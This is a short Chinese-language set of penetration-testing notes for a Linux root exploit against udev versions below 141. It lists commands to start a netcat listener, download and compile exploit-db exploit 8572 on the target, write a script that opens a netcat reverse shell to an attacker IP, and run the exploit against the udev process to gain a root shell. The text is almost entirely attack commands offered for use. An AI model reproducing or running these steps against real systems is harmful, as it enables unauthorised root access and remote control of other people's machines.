*该操作只能在udev版本低于141下进行
udevadm --version 查看udev版本
本机操作
nc -lvp 4444 开启4444端口监听
目标机操作
wget 'http://www.exploit-db.com/download/8572' #下载8572.c文件 ggc 8572.c -o exploit #将文件编译 echo '#!/bin/sh' > /tmp/run echo '/bin/netcat -e /bin/sh IP地址 4444' >> /tmp/run #在/tmp目录下写入run文件 ps -edf |grep udev #查看root的pid号 ./exploit pid-1 #执行pid号-1反弹回root的shell
